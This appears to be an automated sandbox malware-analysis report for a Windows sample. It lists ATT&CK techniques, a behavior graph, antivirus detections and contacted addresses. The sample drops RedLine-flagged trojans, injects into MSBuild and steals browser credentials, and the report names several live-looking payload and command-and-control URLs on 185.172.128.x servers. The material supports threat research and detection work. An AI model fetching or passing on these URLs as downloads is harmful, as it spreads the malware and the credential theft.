                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C8D22D0 sqlite3_bind_blob,1_2_6C8D22D0
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts341
                                Windows Management Instrumentation
                                11
                                DLL Side-Loading
                                1
                                Abuse Elevation Control Mechanism
                                11
                                Disable or Modify Tools
                                2
                                OS Credential Dumping
                                2
                                System Time Discovery
                                Remote Services11
                                Archive Collected Data
                                13
                                Ingress Tool Transfer
                                Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts11
                                Native API
                                1
                                Windows Service
                                11
                                DLL Side-Loading
                                11
                                Deobfuscate/Decode Files or Information
                                11
                                Input Capture
                                1
                                Account Discovery
                                Remote Desktop Protocol4
                                Data from Local System
                                22
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter
                                Logon Script (Windows)1
                                Windows Service
                                1
                                Abuse Elevation Control Mechanism
                                Security Account Manager3
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Screen Capture
                                1
                                Non-Standard Port
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
                                Process Injection
                                3
                                Obfuscated Files or Information
                                NTDS289
                                System Information Discovery
                                Distributed Component Object Model1
                                Email Collection
                                4
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                                Software Packing
                                LSA Secrets551
                                Security Software Discovery
                                SSH11
                                Input Capture
                                125
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                DLL Side-Loading
                                Cached Domain Credentials351
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                Masquerading
                                DCSync13
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job351
                                Virtualization/Sandbox Evasion
                                Proc Filesystem1
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                                Process Injection
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431471 Sample: g77dRQ1Csm.exe Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 85 download.iolo.net 2->85 87 westus2-2.in.applicationinsights.azure.com 2->87 89 7 other IPs or domains 2->89 125 Multi AV Scanner detection for domain / URL 2->125 127 Found malware configuration 2->127 129 Malicious sample detected (through community Yara rule) 2->129 131 17 other signatures 2->131 9 g77dRQ1Csm.exe 3 11 2->9         started        14 run.exe 2->14         started        signatures3 process4 dnsIp5 91 185.172.128.228, 49731, 80 NADYMSS-ASRU Russian Federation 9->91 93 185.172.128.59, 49732, 80 NADYMSS-ASRU Russian Federation 9->93 95 2 other IPs or domains 9->95 69 C:\Users\user\AppData\Local\Temp\u42w.3.exe, PE32 9->69 dropped 71 C:\Users\user\AppData\Local\Temp\...\run.exe, PE32 9->71 dropped 73 C:\Users\user\AppData\Local\...\relay.dll, PE32 9->73 dropped 75 2 other malicious files 9->75 dropped 133 Detected unpacking (changes PE section rights) 9->133 135 Detected unpacking (overwrites its own PE header) 9->135 16 u42w.0.exe 70 9->16         started        21 run.exe 6 9->21         started        23 u42w.3.exe 18 8 9->23         started        25 WerFault.exe 21 16 9->25         started        137 Maps a DLL or memory area into another process 14->137 139 Found direct / indirect Syscall (likely to bypass EDR) 14->139 27 cmd.exe 14->27         started        file6 signatures7 process8 dnsIp9 77 185.172.128.76, 49734, 80 NADYMSS-ASRU Russian Federation 16->77 79 185.172.128.203 NADYMSS-ASRU Russian Federation 16->79 53 C:\Users\user\AppData\...\FCBAECGIEB.exe, PE32 16->53 dropped 55 C:\Users\user\AppData\Local\...\tiktok[1].exe, PE32 16->55 dropped 57 C:\Users\user\AppData\...\softokn3[1].dll, PE32 16->57 dropped 65 11 other files (7 malicious) 16->65 dropped 97 Multi AV Scanner detection for dropped file 16->97 99 Detected unpacking (changes PE section rights) 16->99 101 Detected unpacking (overwrites its own PE header) 16->101 111 9 other signatures 16->111 29 cmd.exe 16->29         started        31 WerFault.exe 16->31         started        59 C:\Users\user\AppData\Roaming\...\relay.dll, PE32 21->59 dropped 61 C:\Users\user\AppData\...\UIxMarketPlugin.dll, PE32 21->61 dropped 103 Maps a DLL or memory area into another process 21->103 105 Found direct / indirect Syscall (likely to bypass EDR) 21->105 33 cmd.exe 4 21->33         started        81 svc.iolo.com 20.157.87.45 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->81 107 Checks if the current machine is a virtual machine (disk enumeration) 23->107 37 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 23->37         started        63 C:\Users\user\AppData\Local\...\oyskbsuqgrwdg, PE32 27->63 dropped 109 Writes to foreign memory regions 27->109 39 conhost.exe 27->39         started        41 MSBuild.exe 27->41         started        file10 signatures11 process12 file13 43 FCBAECGIEB.exe 29->43         started        46 conhost.exe 29->46         started        67 C:\Users\user\AppData\Local\Temp\cqecfsbe, PE32 33->67 dropped 113 Writes to foreign memory regions 33->113 115 Found hidden mapped module (file has been removed from disk) 33->115 117 Maps a DLL or memory area into another process 33->117 48 MSBuild.exe 33->48         started        51 conhost.exe 33->51         started        119 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->119 121 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->121 123 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 37->123 signatures14 process15 dnsIp16 141 Multi AV Scanner detection for dropped file 43->141 83 91.215.85.66 PINDC-ASRU Russian Federation 48->83 143 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 48->143 145 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 48->145 147 Tries to harvest and steal browser information (history, passwords, etc) 48->147 signatures17

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                g77dRQ1Csm.exe41%VirustotalBrowse
                                g77dRQ1Csm.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg100%AviraHEUR/AGEN.1307453
                                C:\Users\user\AppData\Local\Temp\cqecfsbe100%AviraHEUR/AGEN.1307453
                                C:\Users\user\AppData\Local\Temp\u42w.0.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\cqecfsbe100%Joe Sandbox ML
                                C:\ProgramData\freebl3.dll0%ReversingLabs
                                C:\ProgramData\freebl3.dll0%VirustotalBrowse
                                C:\ProgramData\mozglue.dll0%ReversingLabs
                                C:\ProgramData\mozglue.dll0%VirustotalBrowse
                                C:\ProgramData\msvcp140.dll0%ReversingLabs
                                C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                                C:\ProgramData\nss3.dll0%ReversingLabs
                                C:\ProgramData\nss3.dll0%VirustotalBrowse
                                C:\ProgramData\softokn3.dll0%ReversingLabs
                                C:\ProgramData\softokn3.dll0%VirustotalBrowse
                                C:\ProgramData\vcruntime140.dll0%ReversingLabs
                                C:\ProgramData\vcruntime140.dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe21%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe38%VirustotalBrowse
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe21%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe38%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\cqecfsbe57%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Temp\cqecfsbe61%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg57%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg61%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\u42w.0.exe43%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll18%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll13%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\u42w.2\relay.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\u42w.2\relay.dll0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\u42w.2\run.exe0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\u42w.2\run.exe0%VirustotalBrowse
                                C:\Users\user\AppData\Local\Temp\u42w.3.exe4%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\u42w.3.exe3%VirustotalBrowse
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                note.padd.cn.com1%VirustotalBrowse
                                fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                                download.iolo.net0%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                http://www.indyproject.org/0%URL Reputationsafe
                                https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts0%URL Reputationsafe
                                https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B0%URL Reputationsafe
                                http://ocsp.sectigo.com00%URL Reputationsafe
                                https://sectigo.com/CPS0D0%URL Reputationsafe
                                http://185.172.128.228/BroomSetup.exe0%Avira URL Cloudsafe
                                http://185.172.128.76/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                                http://185.172.128.76/3cd2b41cbde8fc9c.php639c1ec5fdf4178fa648df7975496release92036e868a3837ab3d0e580%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/mozglue.dll50%Avira URL Cloudsafe
                                185.172.128.76/3cd2b41cbde8fc9c.php0%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/sqlite3.dll0%Avira URL Cloudsafe
                                http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense0%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/softokn3.dll0%Avira URL Cloudsafe
                                http://185.172.128.76/3cd2b41cbde8fc9c.php13%VirustotalBrowse
                                http://185.172.128.228/BroomSetup.exe23%VirustotalBrowse
                                http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts0%Avira URL Cloudsafe
                                185.172.128.76/3cd2b41cbde8fc9c.php13%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/softokn3.dll0%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/nss3.dllUK0%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/mozglue.dll55%VirustotalBrowse
                                http://185.172.128.59/syncUpd.exe100%Avira URL Cloudmalware
                                https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-0%Avira URL Cloudsafe
                                http://185.172.128.760%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/sqlite3.dll9%VirustotalBrowse
                                http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense0%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/nss3.dll0%Avira URL Cloudsafe
                                http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0100%Avira URL Cloudmalware
                                http://185.172.128.59/syncUpd.exe23%VirustotalBrowse
                                http://185.172.128.203/tiktok.exe100%Avira URL Cloudmalware
                                http://185.172.128.76/15f649199f40275b/mozglue.dll0%Avira URL Cloudsafe
                                http://185.172.128.203/tiktok.exe000%Avira URL Cloudsafe
                                http://185.172.128.7610%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/nss3.dll0%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/softokn3.dllI0%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/msvcp140.dll0%Avira URL Cloudsafe
                                http://185.172.128.203/tiktok.exeq0%Avira URL Cloudsafe
                                http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=021%VirustotalBrowse
                                http://185.172.128.203/tiktok.exe20%VirustotalBrowse
                                http://185.172.128.203/tiktok.exe0015%VirustotalBrowse
                                http://note.padd.cn.com/1/Package.zip0%Avira URL Cloudsafe
                                http://185.172.128.76/3cd2b41cbde8fc9c.phpt0%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/sqlite3.dll90%Avira URL Cloudsafe
                                http://185.172.128.76/15f649199f40275b/softokn3.dllI5%VirustotalBrowse
                                http://note.padd.cn.com/1/Package.zip3%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/msvcp140.dll0%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/mozglue.dll0%VirustotalBrowse
                                http://185.172.128.76/15f649199f40275b/sqlite3.dll98%VirustotalBrowse
                                http://185.172.128.76/3cd2b41cbde8fc9c.phpt3%VirustotalBrowse
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                iolo0.b-cdn.net
                                169.150.236.97
                                truefalse
                                  high
                                  note.padd.cn.com
                                  176.97.76.106
                                  truefalseunknown
                                  svc.iolo.com
                                  20.157.87.45
                                  truefalse
                                    high
                                    fp2e7a.wpc.phicdn.net
                                    192.229.211.108
                                    truefalseunknown
                                    download.iolo.net
                                    unknown
                                    unknowntrueunknown
                                    westus2-2.in.applicationinsights.azure.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      http://185.172.128.228/BroomSetup.exefalse
                                      • 23%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                      • 13%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      low
                                      http://185.172.128.76/3cd2b41cbde8fc9c.phptrue
                                      • 13%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/sqlite3.dlltrue
                                      • 9%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/softokn3.dlltrue
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.59/syncUpd.exefalse
                                      • 23%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/nss3.dlltrue
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0false
                                      • 21%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/mozglue.dlltrue
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://185.172.128.203/tiktok.exefalse
                                      • 20%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://185.172.128.76/15f649199f40275b/msvcp140.dlltrue
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://svc.iolo.com/__svc/sbv/DownloadManager.ashxfalse
                                        high
                                        http://note.padd.cn.com/1/Package.zipfalse
                                        • 3%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://185.172.128.76/3cd2b41cbde8fc9c.php639c1ec5fdf4178fa648df7975496release92036e868a3837ab3d0e58u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/chrome_newtabMSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://monitor.azure.com//.defaultSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpfalse
                                              high
                                              http://www.vmware.com/0run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://snapshot.monitor.azure.com/&SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  high
                                                  http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.u42w.3.exe, 00000005.00000003.2038133988.0000000002674000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025D6000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002639000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinadSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://www.iolo.com/company/legal/sales-policy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.indyproject.org/g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002632000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.iolo.com/support/solutions/articles/44001781185?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://www.iolo.com/company/legal/privacy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            high
                                                            http://www.codeplex.com/CompositeWPFSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.iolo.com/support/solutions/articles/44001781185SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://185.172.128.76/15f649199f40275b/mozglue.dll5u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • 5%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://scripts.sil.org/OFLSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://taskscheduler.codeplex.com/HSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                    high
                                                                    https://www.iolo.com/company/legal/sales-policy/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://scripts.sil.org/OFLX8SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://westus2-2.in.applicationinsights.azure.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alertsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://indiantypefoundry.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://download.avira.com/download/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModelSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://dejavu.sourceforge.netSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.mozilla.com/en-US/blocklist/u42w.0.exe, u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpfalse
                                                                                      high
                                                                                      https://www.iolo.com/company/legal/privacy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • 0%, Virustotal, Browse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://rt.services.visualstudio.com/lSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnectionrun.exe, run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                high
                                                                                                https://dc.services.visualstudio.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://pastebin.com/raw/z9pYkqPQPOMSBuild.exe, 00000019.00000002.2209535143.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
